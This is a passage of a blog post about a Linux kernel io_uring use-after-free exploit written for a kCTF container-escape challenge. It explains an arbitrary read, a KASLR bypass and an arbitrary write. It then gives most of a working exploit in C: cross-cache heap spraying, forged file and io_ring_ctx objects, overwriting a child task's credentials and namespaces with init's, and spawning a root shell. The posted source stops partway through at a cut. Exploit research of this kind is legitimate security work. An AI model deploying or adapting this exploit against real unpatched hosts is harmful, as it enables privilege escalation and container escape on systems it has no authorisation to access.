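In practice, each byte of the arbitrary read is one pipe rewrite plus one fcntl() call. Here is a minimal sketch, assuming the pipe page and the fake file's slot offset (g_off) are already known and reusing the globals, constants, and err() helper from the full exploit at the end of the post; the real read_8_at() helper sprays all 16 file slots on the page because at this stage we don't yet know which slot our UAF file occupies:

#define HINT_OFF 0x8fUL   // offset of i_write_hint inside struct inode (value from the full exploit)

uint8_t read_byte_at(uint64_t addr)
{
    unsigned char page[4096] = { 0 };

    // Drain the old page contents, then rewrite the page so the fake file's
    // f_inode (offset 0x20 into struct file) points at (addr - HINT_OFF),
    // which puts inode->i_write_hint right on top of our target byte
    read(g_pipe.fd[PIPE_READ], page, sizeof(page));
    *(uint64_t *)&page[g_off + 0x20] = addr - HINT_OFF;
    write(g_pipe.fd[PIPE_WRITE], page, sizeof(page));

    // F_GET_RW_HINT copies inode->i_write_hint back to userspace
    uint64_t arg = 0;
    if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
    {
        err("`fcntl()` failed");
    }

    return (uint8_t)arg;
}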

This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?

Finding a Read Target

So we can read data at any address we want, but we don’t know what to read. I struggled thinking about this for a while, but then remembered that the cpu_entry_area was not randomized boot to boot, it is always at the same address. I knew this from the above blogpost about the file UAF, but also vaguely from @ky1ebot tweets like this one.

cpu_entry_area is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of Interrupt Stacks in the kernel that can be used in the event that an exception must be handled for instance.

After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the cpu_entry_area consistently and that was an address inside the error_entry function which is as follows:

SYM_CODE_START_LOCAL(error_entry)
	UNWIND_HINT_FUNC

	PUSH_AND_CLEAR_REGS save_ret=1
	ENCODE_FRAME_POINTER 8

	testb	$3, CS+8(%rsp)
	jz	.Lerror_kernelspace

	/*
	 * We entered from user mode or we're pretending to have entered
	 * from user mode due to an IRET fault.
	 */
	swapgs
	FENCE_SWAPGS_USER_ENTRY
	/* We have user CR3.  Change to kernel CR3. */
	SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
	IBRS_ENTER
	UNTRAIN_RET

	leaq	8(%rsp), %rdi			/* arg0 = pt_regs pointer */
.Lerror_entry_from_usermode_after_swapgs:

	/* Put us onto the real thread stack. */
	call	sync_regs
	RET
<SNIP>

error_entry seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function might be found on what I was guessing was an interrupt stack in the cpu_entry_area. The address was that of the call sync_regs portion of the function. I was never able to confirm what types of common exceptions/interrupts were taking place on the system that would push that address onto the stack (presumably when the call was executed), but maybe someone can chime in and correct me if I'm wrong about this portion of the exploit. It made sense to me at least, and the address's presence in the cpu_entry_area was so consistent that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.
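
Once that pointer can be read, the rest is constant-offset arithmetic; a sketch using the same constants and helpers that appear in the full exploit at the end of the post:

uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);   // fixed address inside cpu_entry_area
uint64_t kern_base   = error_entry - EE_OFF;          // constant offset back to the kernel base

// Sanity check: the first 8 bytes of the kernel image are a known signature
if (read_8_at(kern_base) != KERNEL_SIGNATURE)
{
    err("Bad kernel signature");
}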

Again, this portion didn’t take very long to figure out because I had just been introduced to cpu_entry_area by the aforementioned blogposts at the time.

Where are the Write Gadgets?

I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an fd as an argument and tracing through them, this time looking for calls to copy_from_user, but I didn’t have the same luck. During this time, I was discussing the topic with my very talented friend @Firzen14 and he brought up this concept here: https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9. In the P0 blogpost, they talk about how the signalfd_ctx of a signalfd file is stored in the f.file->private_data field and how the signalfd syscall allows the attacker to perform a write of the ctx->sigmask. So in our situation, since we control the entire fake file contents, forging a fake signalfd_ctx in memory would be quite easy since we have access to an entire page of memory.

I couldn’t use this technique for my personally imposed challenge though since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the private_data field of our struct file. So at this point, I went hunting for usages of private_data in the kernel code base. As you can see, the member is used in many many places: https://elixir.bootlin.com/linux/latest/C/ident/private_data.

This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at io_uring itself.

Looking for instances where the file->private_data was used, I quickly found an instance right in the very function that was related to the bug. In io_msg_ring, you can see that a target_ctx of type io_ring_ctx is derived from req->file->private_data. Since we control the fake file, we can control the private_data contents (a pointer to a fake io_ring_ctx in this case).

io_msg_ring is used to pass data from one io ring to another, and you can see that in io_fill_cqe_aux, we actually retrieve a io_uring_cqe struct from our potentially faked io_uring_ctx via io_get_cqe. Immediately, we see several WRITE_ONCE macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur, didn’t really fit my exploitation plan. So for now, we’ll find a 2nd write in the same code path.

Immediately after the call to io_fill_cqe_aux, there is one to io_commit_cqring using our faked io_uring_ctx:

static inline void io_commit_cqring(struct io_ring_ctx *ctx)
{
	/* order cqe stores with ring update */
	smp_store_release(&ctx->rings->cq.tail, ctx->cached_cq_tail);
}

This is basically a memcpy, we write the contents of ctx->cached_cq_tail (100% user-controlled) to &ctx->ring->cq.tail (100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4 byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.
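
Since the values we'll eventually want to plant are 8-byte pointers, each overwrite becomes two 4-byte writes. A sketch of the wrapper, mirroring overwrite_cred() in the full exploit; the `- 1` compensates for the kernel incrementing the cached tail value after the store:

void write_ptr(uint64_t what, uint64_t where)
{
    // Low dword first, then high dword: the "torn" 8-byte write discussed later
    write_what_where((uint32_t)(what & 0xFFFFFFFF) - 1, where);
    write_what_where((uint32_t)((what >> 32) & 0xFFFFFFFF) - 1, where + 0x4);
}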

Exploitation Plan

Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.

I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. This post from Cyberark was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen’s blog post on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.

Finding Init

At this point, my goal is to find the host Init task_struct in memory and find the value of a few important members: real_cred, cred, and nsproxy. real_cred is used to track the user and group IDs that were originally responsible for creating the process and unlike cred, real_cred remains constant and does not change due to things like setuid. cred is used to convey the “effective” credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, nsproxy is a pointer to a struct that contains all of the information about our task’s namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our task_struct. Luckily, the address of the init task is a constant offset from the kernel base, so once we broke KASLR with our read of the error_entry address, we can then copy those values with our arbitrary read capability since they would reside at known addresses (offsets from the init task symbol).

Forging Objects

With those values in hand, we now need to find our own task_struct in memory so that we can overwrite our members with those of init. To do this, I took advantage of the fact that the task_struct has a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name, this name fits within the task_struct comm field, and so as I traverse through the linked list of tasks on the system, I just simply check each task’s comm field for my easily identifiable child process. You can see how I do that in this code snippet:

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember, we need to fake a few objects in memory, like the io_uring_ctx for instance. Usually this is done by crafting objects in the kernel heap and somehow discovering their address with a leak. In my case, I have a whole pipe buffer, which is 4096 bytes of memory, to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a file descriptor table inside of its files member. After some time printk'ing some offsets, I was able to traverse through my own task's file descriptor table and learn the address of my pipe buffer. This is because the pipe buffer page is obviously page aligned, so I can just page-align the UAF file address we read from the file descriptor table to get the pipe buffer's address. So now I know exactly where my pipe buffer is in memory, and I also know at what offset onto that page our UAF struct file resides. I have a small helper function to set a "scratch space" region address as a global and then use that memory to set up our fake io_uring_ctx. You can see those functions here, first finding our pipe buffer address:

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

And then determining the location of our scratch space where we will forge the fake io_uring_ctx:

// Here, all we're doing is determining which side of the page the UAF file is on;
// if it's on the front half of the page, the back half is our scratch space,
// and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}

Now we have one more read to do and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake io_uring_ctx contains as many valid fields as necessary. If you start with a completely NULL object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to copy a legitimate instance of a real io_uring_ctx by reading and copying its contents to a global buffer. Working now from a good base, our forged object can then be set up properly to perform our arbitrary write from; you can see me using the copy and updating the necessary fields here:

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

Performing Our Writes

Now, it’s time to do our writes. Remember those three sequential writes we were going to use inside of io_fill_cqe_aux, but I said they wouldn’t work with the exploit plan? Well the reason was, those three writes were as follows:

cqe = io_get_cqe(ctx);
	if (likely(cqe)) {
		WRITE_ONCE(cqe->user_data, user_data);
		WRITE_ONCE(cqe->res, res);
		WRITE_ONCE(cqe->flags, cflags);

They worked really well until I went to overwrite the target nsproxy member of our target child task_struct. One of those writes inevitably overwrote the members right next to nsproxy: signal and sighand. This caused big problems for me because as interrupts occurred, those members (pointers) would be deref’d and cause the kernel to panic since they were invalid values. So I opted to just use the 4-byte write inside io_commit_cqring instead. The 4-byte write also caused problems in that at some points current has its creds checked, and with what basically amounted to a torn 8-byte write, we would leave current’s cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.

Now we can just use those same steps to overwrite the three members real_cred, cred, and nsproxy, and our child has all of the same privileges and capabilities that init does, including visibility into the host root file system. This is perfect, but I still wasn’t able to get the flag!

I started to panic at this point that I had seriously done something wrong. The exploit is FULL of paranoid checks: I reread every overwritten value to make sure it’s correct, for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered that in Andy Nguyen’s blog post, he used his root privileges to explicitly set his namespace values with calls to setns. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as init, I was able to give it the same namespaces of itself lol. I still haven’t followed through on this to determine how setns is implemented, but this could probably be done without explicit setns calls and only with our read and write tools:

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

And finally I was able to drop into a root shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal: I had some out-of-band confirmation/paranoia checks I had to leave out, but fortunately the arbitrary read we used isn’t actually hooked in any way by SELinux, unlike most of the other fcntl commands. Remember, at that point we don’t know enough information to fake any objects in memory, so I’d be dead in the water if that read method was ruined by SELinux.

Conclusion

This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also @chompie1337 who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.

// Compile
// gcc sploit.c -o sploit -l:liburing.a -static -Wall

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <stdarg.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#include "liburing.h"

// /sys/kernel/slab/filp/objs_per_slab
#define OBJS_PER_SLAB 16UL
// /sys/kernel/slab/filp/cpu_partial
#define CPU_PARTIAL 52UL
// Multiplier for cross-cache arithmetic
#define OVERFLOW_FACTOR 2UL
// Largest number of objects we could allocate per Cross-cache step
#define CROSS_CACHE_MAX 8192UL
// Fixed mapping in cpu_entry_area whose contents is NULL
#define NULL_MEM 0xfffffe0000002000UL
// Reading side of pipe
#define PIPE_READ 0
// Writing side of pipe
#define PIPE_WRITE 1
// error_entry inside cpu_entry_area pointer
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
// Offset from `error_entry` pointer to kernel base
#define EE_OFF 0xe0124dUL
// Kernel text signature
#define KERNEL_SIGNATURE 0x4801803f51258d48UL
// Offset from kernel base to init_task
#define INIT_OFF 0x18149c0UL
// Offset from task to task->comm
#define COMM_OFF 0x738UL
// Offset from task to task->real_cred
#define REAL_CRED_OFF 0x720UL
// Offset from task to task->cred
#define CRED_OFF 0x728UL
// Offset from task to task->nsproxy
#define NSPROXY_OFF 0x780UL
// Offset from task to task->files
#define FILES_OFF 0x770UL
// Offset from task->files to &task->files->fdt
#define FDT_OFF 0x20UL
// Offset from &task->files->fdt to &task->files->fdt->fd
#define FD_ARRAY_OFF 0x8UL
// Offset from task to task->tasks.next
#define TASKS_NEXT_OFF 0x458UL
// Process name to give root creds to 
#define TARGET_TASK "blegh2"
// Our process name
#define OUR_TASK "blegh1"
// Offset from kernel base to io_uring_fops
#define FOPS_OFF 0x1220200UL

// Shared memory with child
void *g_shmem;

// Child pid
pid_t g_child = -1;

// io_uring instance to use
struct io_uring g_ring = { 0 };

// UAF file handle
int g_uaf_fd = -1;

// Track pipes
struct fd_pair {
    int fd[2];
};
struct fd_pair g_pipe = { 0 };

// The offset on the page where our `file` is
size_t g_off = 0;

// Our fake file that is a copy of a legit io_uring fd
unsigned char g_ring_copy[256] = { 0 };

// Keep track of files added in Cross-cache steps
int g_cc1_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc1_num = 0;
int g_cc2_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc2_num = 0;
int g_cc3_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc3_num = 0;

// Gadgets and offsets
uint64_t g_kern_base = 0;
uint64_t g_init_task = 0;
uint64_t g_target_task = 0;
uint64_t g_our_task = 0;
uint64_t g_cred_what = 0;
uint64_t g_nsproxy_what = 0;
uint64_t g_cred_where = 0;
uint64_t g_real_cred_where = 0;
uint64_t g_nsproxy_where = 0;
uint64_t g_files = 0;
uint64_t g_fdt = 0;
uint64_t g_file_array = 0;
uint64_t g_file_addr = 0;
uint64_t g_pipe_buf = 0;
uint64_t g_scratch = 0;
uint64_t g_fops = 0;

void err(const char* format, ...)
{
    if (!format) {
        exit(EXIT_FAILURE);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, ": %s\n", strerror(errno));

    sleep(5);
    exit(EXIT_FAILURE);
}

void info(const char* format, ...)
{
    if (!format) {
        return;
    }
    
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}

// Get FD for test file
int get_test_fd(int victim)
{
    // These are just different for kernel debugging purposes
    char *file = NULL;
    if (victim) { file = "/etc//passwd"; }
    else { file = "/etc/passwd"; }

    int fd = open(file, O_RDONLY);
    if (fd < 0)
    {
        err("`open()` failed, file: %s", file);
    }

    return fd;
}

// Set-up the file that we're going to use as our victim object
void alloc_victim_filp(void)
{
    // Open file to register
    g_uaf_fd = get_test_fd(1);
    info("Victim fd: %d", g_uaf_fd);

    // Register the file
    int ret = io_uring_register_files(&g_ring, &g_uaf_fd, 1);
    if (ret)
    {
        err("`io_uring_register_files()` failed");
    }

    // Get hold of the sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Init sqe vals
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = 0;
    sqe->flags |= IOSQE_FIXED_FILE;

    ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// Set CPU affinity for calling process/thread
void pin_cpu(long cpu_id)
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(cpu_id, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
    {
        err("`sched_setaffinity()` failed: %s", strerror(errno));
    }

    return;
}

// Increase the number of FDs we can have open
void increase_fds(void)
{
    struct rlimit old_lim, lim;
	
	if (getrlimit(RLIMIT_NOFILE, &old_lim) != 0)
    {
        err("`getrlimit()` failed: %s", strerror(errno));
    }
		
	lim.rlim_cur = old_lim.rlim_max;
	lim.rlim_max = old_lim.rlim_max;

	if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
    {
		err("`setrlimit()` failed: %s", strerror(errno));
    }

    info("Increased fd limit from %d to %d", old_lim.rlim_cur, lim.rlim_cur);

    return;
}

void create_pipe(void)
{
    if (pipe(g_pipe.fd) == -1)
    {
        err("`pipe()` failed");
    }
}

void release_pipe(void)
{
    close(g_pipe.fd[PIPE_WRITE]);
    close(g_pipe.fd[PIPE_READ]);
}

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

// Set-up environment for exploit
void setup_env(void)
{
    // Make sure a page is a page and we're not on some bullshit machine
    long page_sz = sysconf(_SC_PAGESIZE);
    if (page_sz != 4096L)
    {
        err("Page size was: %ld", page_sz);
    }

    // Pin to CPU 0
    pin_cpu(0);
    info("Pinned process to core-0");

    // Increase FD limit
    increase_fds();

    // Create shared mem
    g_shmem = mmap(
        (void *)0x1337000,
        page_sz,
        PROT_READ | PROT_WRITE,
        MAP_ANONYMOUS | MAP_FIXED | MAP_SHARED,
        -1,
        0
    );
    if (g_shmem == MAP_FAILED) { err("`mmap()` failed"); }
    info("Shared memory @ 0x%lx", g_shmem);

    // Create child
    g_child = fork();
    if (g_child == -1)
    {
        err("`fork()` failed");
    }

    // Child
    if (g_child ==  0)
    {
        child_exec();
    }
    info("Spawned child: %d", g_child);

    // Change our name
    if (prctl(PR_SET_NAME, OUR_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    // Create io ring
    struct io_uring_params params = { 0 };
    if (io_uring_queue_init_params(8, &g_ring, &params))
    {
        err("`io_uring_queue_init_params()` failed");
    }
    info("Created io_uring");

    // Create pipe
    info("Creating pipe...");
    create_pipe();
}

// Decrement file->f_count to 0 and free the filp
void do_uaf(void)
{
    if (io_uring_unregister_files(&g_ring))
    {
        err("`io_uring_unregister_files()` failed");
    }

    // Let the free actually happen
    usleep(100000);
}

// Cross-cache 1:
// Allocate enough objects that we have definitely allocated enough
// slabs to fill up the partial list later when we free an object from each
// slab
void cc_1(void)
{
    // Calculate the amount of objects to spray
    uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;
    g_cc1_num = spray_amt;

    // Paranoid
    if (spray_amt > CROSS_CACHE_MAX) { err("Illegal spray amount"); }

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc1_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
void cc_2(void)
{
    // Step 2:
    // Allocate OBJS_PER_SLAB to *probably* create a new active slab
    uint64_t spray_amt = OBJS_PER_SLAB - 1;
    g_cc2_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc2_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 3:
// Allocate enough objects to definitely fill the rest of the active slab
// and start a new active slab
void cc_3(void)
{
    uint64_t spray_amt = OBJS_PER_SLAB + 1;
    g_cc3_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc3_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 4:
// Free all the filps from steps 2, and 3. This will place our victim 
// page in the partial list completely empty
void cc_4(void)
{
    //info("Freeing `filp` objects from CC2 and CC3...");
    for (size_t i = 0; i < g_cc2_num; i++)
    {
        close(g_cc2_fds[i]);
    }

    for (size_t i = 0; i < g_cc3_num; i++)
    {
        close(g_cc3_fds[i]);
    }
    usleep(100000);

    return;
}

// Cross-cache 5:
// Free an object for each slab we allocated in Step 1 to overflow the 
// partial list and get our empty slab in the partial list freed
void cc_5(void)
{
    //info("Freeing `filp` objects to overflow CPU partial list...");
    for (size_t i = 0; i < g_cc1_num; i++)
    {
        if (i % OBJS_PER_SLAB == 0)
        {
            close(g_cc1_fds[i]);
        }
    }
    usleep(100000);

    return;
}

// Reset all state associated with a cross-cache attempt
void cc_reset(void)
{
    // Close all the remaining FDs
    info("Resetting cross-cache state...");
    for (size_t i = 0; i < CROSS_CACHE_MAX; i++)
    {
        close(g_cc1_fds[i]);
        close(g_cc2_fds[i]);
        close(g_cc3_fds[i]);
    }

    // Reset number trackers
    g_cc1_num = 0;
    g_cc2_num = 0;
    g_cc3_num = 0;
}

// Do cross cache process
void do_cc(void)
{
    // Start cross-cache process
    cc_1();
    cc_2();

    // Allocate the victim filp
    alloc_victim_filp();

    // Free the victim filp
    do_uaf();

    // Resume cross-cache process
    cc_3();
    cc_4();
    cc_5();

    // Allow pages to be freed
    usleep(100000);
}

void reset_pipe_buf(void)
{
    char buf[4096] = { 0 };
    read(g_pipe.fd[PIPE_READ], buf, 4096);
}

void zero_pipe_buf(void)
{
    char buf[4096] = { 0 };
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);
}

// Offset inside of inode to inode->i_write_hint
#define HINT_OFF 0x8fUL

// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at
// file->inode->i_write_hint
uint64_t read_8_at(unsigned long addr)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 8 times to read 8 bytes
    uint64_t val = 0;
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to val
        val |= (arg << (i * 8));
    }

    return val;
}

void read_comm_at(unsigned long addr, char *comm)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 8 times to read 8 bytes (enough for our short task names)
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to comm buf
        comm[i] = arg;
    }
}

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
